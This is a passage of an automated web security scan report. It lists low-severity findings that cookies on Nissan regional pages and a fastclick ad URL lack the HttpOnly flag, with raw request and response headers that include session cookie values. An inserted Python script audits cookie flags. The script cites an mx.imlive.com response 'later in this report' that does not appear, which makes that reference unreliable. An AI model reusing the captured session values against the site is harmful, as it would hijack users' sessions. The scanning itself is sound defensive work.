The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /providence-new-bedford-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=02901; expires=Sat, 05-Feb-2011 04:53:11 GMT; path=/
Set-Cookie: localDMA=providence-new-bedford-area; expires=Sat, 05-Feb-2011 04:53:11 GMT; path=/
Content-Length: 162269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.433. http://local.nissanusa.com/sacramento-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /sacramento-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sacramento-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=95814; expires=Sat, 05-Feb-2011 04:57:22 GMT; path=/
Set-Cookie: localDMA=sacramento-area; expires=Sat, 05-Feb-2011 04:57:22 GMT; path=/
Content-Length: 129688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.434. http://local.nissanusa.com/salt-lake-city-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /salt-lake-city-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /salt-lake-city-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=84101; expires=Sat, 05-Feb-2011 04:55:25 GMT; path=/
Set-Cookie: localDMA=salt-lake-city-area; expires=Sat, 05-Feb-2011 04:55:25 GMT; path=/
Content-Length: 109201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.435. http://local.nissanusa.com/san-antonio-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /san-antonio-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /san-antonio-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=78201; expires=Sat, 05-Feb-2011 04:53:34 GMT; path=/
Set-Cookie: localDMA=san-antonio-area; expires=Sat, 05-Feb-2011 04:53:34 GMT; path=/
Content-Length: 106603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.436. http://local.nissanusa.com/san-diego-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /san-diego-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /san-diego-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=92101; expires=Sat, 05-Feb-2011 04:56:59 GMT; path=/
Set-Cookie: localDMA=san-diego-area; expires=Sat, 05-Feb-2011 04:56:59 GMT; path=/
Content-Length: 138834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.437. http://local.nissanusa.com/san-francisco-oakland-san-jose-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /san-francisco-oakland-san-jose-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /san-francisco-oakland-san-jose-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=94101; expires=Sat, 05-Feb-2011 04:56:51 GMT; path=/
Set-Cookie: localDMA=san-francisco-oakland-san-jose-area; expires=Sat, 05-Feb-2011 04:56:51 GMT; path=/
Content-Length: 130539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.438. http://local.nissanusa.com/seattle-tacoma-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /seattle-tacoma-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seattle-tacoma-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: downScroll=deleted; expires=Fri, 29-Jan-2010 04:57:23 GMT
Set-Cookie: localZIP=98101; expires=Sat, 05-Feb-2011 04:57:24 GMT; path=/
Set-Cookie: localDMA=seattle-tacoma-area; expires=Sat, 05-Feb-2011 04:57:24 GMT; path=/
Content-Length: 118363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.439. http://local.nissanusa.com/st-louis-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /st-louis-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /st-louis-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=63101; expires=Sat, 05-Feb-2011 04:52:04 GMT; path=/
Set-Cookie: localDMA=st-louis-area; expires=Sat, 05-Feb-2011 04:52:04 GMT; path=/
Content-Length: 111818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.440. http://local.nissanusa.com/tampa-st-petersburg-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /tampa-st-petersburg-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tampa-st-petersburg-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=33601; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/
Set-Cookie: localDMA=tampa-st-petersburg-area; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/
Content-Length: 126968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.441. http://local.nissanusa.com/washington-dc-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /washington-dc-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /washington-dc-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=20001; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/
Set-Cookie: localDMA=washington-dc-area; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/
Content-Length: 156002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.442. http://local.nissanusa.com/wilkes-barre-scranton-pa-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /wilkes-barre-scranton-pa-area

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wilkes-barre-scranton-pa-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=18701; expires=Sat, 05-Feb-2011 04:53:14 GMT; path=/
Set-Cookie: localDMA=wilkes-barre-scranton-pa-area; expires=Sat, 05-Feb-2011 04:53:14 GMT; path=/
Content-Length: 165898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

11.443. http://local.nissanusa.com/zip.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /zip.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546\ HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:51:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:51:51 GMT
Content-Length: 15973
Connection: close
Set-Cookie: downScroll=deleted; expires=Fri, 29-Jan-2010 04:51:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
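The check behind this finding type, as an added example that is not part of the CloudScan/Burp report: it parses every Set-Cookie header in a raw HTTP response, reports each distinct cookie that lacks HttpOnly (and, when the response was served over HTTPS, Secure), and applies the same heuristic the report states, namely whether the cookie name looks like a session token. Two assumptions are mine: the name pattern used to spot session cookies, and the treatment of BIGipServer*/NSC_* names as load-balancer persistence cookies rather than application session tokens. The sample response is constructed from the mx.imlive.com response reproduced later in this report, with the long opaque values shortened.

```python
"""Audit Set-Cookie headers for missing HttpOnly / Secure flags.

Added example (not the report's own code). Reproduces the logic behind the
"cookie without HttpOnly flag set" finding over a raw HTTP response.
"""
import re
from dataclasses import dataclass

# Heuristic (assumption): names containing "sess" or "sid" are treated as
# session identifiers (PHPSESSID, JSESSIONID, ASP.NET_SessionId, ...).
SESSION_NAME_RE = re.compile(r"sess|sid", re.I)

# Assumption: these prefixes are load-balancer persistence cookies (F5 BIG-IP,
# Citrix NetScaler). They pin a client to a backend node, not to an
# authenticated session, so they are reported but ranked lower.
LB_PERSISTENCE_PREFIXES = ("BIGipServer", "NSC_")


@dataclass
class CookieAudit:
    name: str
    value: str
    attrs: dict          # lower-cased attribute name -> value ("" for bare flags)
    httponly: bool
    secure: bool
    session_like: bool
    lb_persistence: bool


def parse_set_cookie(header_value: str) -> CookieAudit:
    """Parse one Set-Cookie header value: name=value; attr[=val]; attr[=val] ..."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")   # the value may itself contain '='
    name = name.strip()
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return CookieAudit(
        name=name,
        value=value.strip(),
        attrs=attrs,
        httponly="httponly" in attrs,
        secure="secure" in attrs,
        session_like=bool(SESSION_NAME_RE.search(name)),
        lb_persistence=name.startswith(LB_PERSISTENCE_PREFIXES),
    )


def set_cookie_headers(raw_response: str):
    """Yield the value of every Set-Cookie header in the head of a raw HTTP response."""
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]
    for line in head.splitlines():
        hname, sep, val = line.partition(":")
        if sep and hname.strip().lower() == "set-cookie":
            yield val.strip()


def audit_response(raw_response: str, over_https: bool = False):
    """Return (name, severity, missing_flags) for each distinct cookie lacking a flag.

    A repeated Set-Cookie for the same name counts once. Session-like cookies
    are ranked "Low"; everything else is informational, as in the report.
    """
    seen = {}
    for hv in set_cookie_headers(raw_response):
        c = parse_set_cookie(hv)
        seen[c.name] = c
    findings = []
    for c in seen.values():
        missing = []
        if not c.httponly:
            missing.append("HttpOnly")
        if over_https and not c.secure:
            missing.append("Secure")
        if not missing:
            continue
        if c.session_like:
            severity = "Low"
        elif c.lb_persistence:
            severity = "Information (load-balancer persistence cookie)"
        else:
            severity = "Information"
        findings.append((c.name, severity, missing))
    return findings


# Constructed sample: the mx.imlive.com response from this report, opaque cookie
# values shortened. The duplicated ASP.NET_SessionId header is as in the original.
SAMPLE_RESPONSE = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Cache-Control: private",
    "Content-Type: text/html; charset=utf-8",
    "Server: Microsoft-IIS/7.0",
    "Set-Cookie: ASP.NET_SessionId=wytymorw54fw1s453wwi1b45; path=/; HttpOnly",
    "X-AspNet-Version: 2.0.50727",
    "Set-Cookie: ASP.NET_SessionId=wytymorw54fw1s453wwi1b45; path=/; HttpOnly",
    "Set-Cookie: spvdr=vd=a13018e7-4eaf-491b-9a58-2a08ebf5d10b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:13 GMT; path=/",
    "Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD; path=/",
    "Content-Length: 18291",
    "Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/",
    "",
    "<!DOCTYPE html PUBLIC ...>",
])

if __name__ == "__main__":
    for name, severity, missing in audit_response(SAMPLE_RESPONSE):
        print(f"{name}: missing {', '.join(missing)} [{severity}]")
```

Run it on a saved capture (headers first, as in the Request/Response blocks of this report) to get the per-cookie list this finding type is built from. For the hosts in this report, which are all plain http, leave over_https at its default: a missing Secure flag only becomes a finding when the site is also reachable over TLS.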

11.444. http://media.fastclick.net/w/click.here

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/click.here

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (the cookie names are visible in the Set-Cookie headers of the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/click.here?cid=276818;mid=522556;m=1;sid=54393;c=0;tp=5;forced_click=\ HTTP/1.1
Host: media.fastclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; zru=1|:1294800534|; adv_ic=BxQAAAAcbUNNIAYGAAFJAACZUCAHIAtAAAIes0CAFwdDAACpSAAAYEAUIAABU2jgAS8BP17gAS8CvQ0/4AAvBBtZAAB2ICtAAAFcZ+ABLwDF4AIvAZph4AEXALDgAhcBpmDgARcBAlvgAV8B0FzgARcA/CCPwKcBCFfgARcAviBHAANAdCAAAXhL4AEXAHngAkcBXNWg1yDvAWQ44AFHAIvAvyAXAc1P4AFHAFXgAhcBR1PgAS8AJuACFwAPIHfAjwAD4AIXABjgAhcB/gyhHyBfAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwHVXOABRwCr4AIXAXlHwBcBAAA=; vt=10070:256698:477674:54816:0:1295925050:3|10991:274413:511325:54393:0:1296263251:0|; pluto=517004695355|v1; pjw=BBQAAAACIAMDClZDTSAGAQABIAMCYEUEYBMC/fcHIA2AEwEeVOABHwBfoB8A/OACHwEpU+ABHwLmLwRgRwFfzeABPwE7UeABHwRORwQAAyBXAej74AEfAUVQ4AEfBDzSAwAEIB8B+hHgAR8BbkzgAR8BLjeAXwEq3uABHwF4S+ABHwBQIJ9AxwDX4AKfAX9K4AEfAYdBgB8B9fDgAT8BlEjgAR8BWEOAHwGa9eABHwGoRuABHwFSOYAfATz54AEfARxt4AEfAiTpA2E/AMegXwAGIMsBU2jgAR8A7aEfAF2hH0AfAVxn4AEfAFegvwDUoL9AHwGaYeABHwBfoJ8AmKCfQB8BpmDgAR8AbKCfAEugn0AfAc9c4AEfAS8sgL8BS8WAv0AfAdpb4AEfAJGhHwHu8uABHwEIV+ABHwEyRIG/AFLgAn8AOuEC3wHGLoBfAXHM4AE/4QOfASk/gB8BDu3AHwEAAA==;

Response

HTTP/1.1 302 Redirect
Date: Sat, 29 Jan 2011 05:00:38 GMT
Location: \
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: srb=BAEAAAABIAMDPnJDTSAGYAsCLywEIAmACwAGIAcDAAAAAA==; domain=.fastclick.net; path=/; expires=Mon, 31-Jan-2011 05:00:38 GMT
